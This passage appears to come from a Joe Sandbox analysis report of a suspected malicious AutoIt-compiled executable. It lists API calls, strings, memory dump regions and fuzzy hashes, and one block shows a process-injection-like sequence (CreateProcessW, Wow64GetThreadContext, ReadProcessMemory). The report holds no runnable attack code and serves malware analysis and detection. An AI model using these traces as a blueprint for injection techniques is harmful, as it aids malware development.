                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                  • String ID:
                                                                                  • API String ID: 3170942423-0
                                                                                  • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                  • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                  • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                  • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                  APIs
                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 03FAA375
                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FAA399
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FAA3BB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2227636278.0000000003FA8000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA8000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_3fa8000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 2438371351-0
                                                                                  • Opcode ID: 86d3f5362505df67a9802f6ff4ae5504519ef5f7159c53e5db4ac50a1c40347f
                                                                                  • Instruction ID: 3f278a47b20c9c711070cc10d1bec832f5a2ddc662ff5fa4dff7f12fceaea847
                                                                                  • Opcode Fuzzy Hash: 86d3f5362505df67a9802f6ff4ae5504519ef5f7159c53e5db4ac50a1c40347f
                                                                                  • Instruction Fuzzy Hash: 74620A70A14658DBEB24CFA4C850BDEB376EF58300F1091A9D10DEB390E77A9E85CB59
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                  • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                                  • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                  • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                  • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                                  • String ID:
                                                                                  • API String ID: 2808897238-0
                                                                                  • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                  • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                  • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                  • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: Error:
                                                                                  • API String ID: 4104443479-232661952
                                                                                  • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                  • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                  • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                  • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                  APIs
                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                    • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                    • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                    • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                    • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                  • String ID: X$pWH
                                                                                  • API String ID: 85490731-941433119
                                                                                  • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                  • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                  • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                  • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                  • _memmove.LIBCMT ref: 00401B57
                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                  • String ID: @EXITCODE
                                                                                  • API String ID: 2734553683-3436989551
                                                                                  • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                  • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                  • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                  • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                  • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                  • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                  • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 1794320848-0
                                                                                  • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                  • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                  • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                  • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 2429186680-0
                                                                                  • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                  • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                  • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                  • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                  APIs
                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell_
                                                                                  • String ID:
                                                                                  • API String ID: 1144537725-0
                                                                                  • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                  • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                  • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                  • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 0043214B
                                                                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                  • _malloc.LIBCMT ref: 0043215D
                                                                                  • _malloc.LIBCMT ref: 0043216F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 680241177-0
                                                                                  • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                  • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                  • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                  • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                  APIs
                                                                                  • TranslateMessage.USER32(?), ref: 00409556
                                                                                  • DispatchMessageW.USER32(?), ref: 00409561
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 4217535847-0
                                                                                  • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                  • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                                  • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                  • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                                  APIs
                                                                                    • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                  • _free.LIBCMT ref: 004295A0
                                                                                    • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                    • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                    • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                    • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                    • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                    • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                                                  • API String ID: 3938964917-2806939583
                                                                                  • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                  • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                  • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                  • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                  Strings
                                                                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strcat
                                                                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                  • API String ID: 1765576173-2684727018
                                                                                  • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                  • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                  • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                  • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClearVariant
                                                                                  • String ID:
                                                                                  • API String ID: 1473721057-0
                                                                                  • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
